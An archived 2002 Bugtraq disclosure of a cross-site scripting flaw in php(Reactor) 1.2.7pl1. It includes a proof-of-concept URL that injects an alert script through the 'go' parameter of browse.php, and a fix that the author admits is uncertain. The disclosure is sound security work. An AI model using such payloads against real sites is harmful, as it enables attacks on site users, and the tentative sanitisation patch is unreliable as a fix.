XSS bug in php(Reactor)
From: Arab VieruZ (arabviersus@hotmail.com)Date: 10/10/02
- Previous message: Janusz Niewiadomski: "Multiple vendor ypxfrd map handling vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 10 Oct 2002 12:43:11 -0000 From: Arab VieruZ <arabviersus@hotmail.com> To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
Vulnerable systems:
1.2.7pl1
Exploit:
forums/browse.php?fid=3&tid=46&go=<scri*pt>JavaScript:alert
('Hi');</scri*pt>
(with out "*")
Solution:
i thought this but i am not sure
open browse.php and add this code in line 52:
$go = HTMLSpecialChars($go);
$go = PREG_Replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $go);
----------------------------------
Arab Vieruz
thanx
- Previous message: Janusz Niewiadomski: "Multiple vendor ypxfrd map handling vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Loading
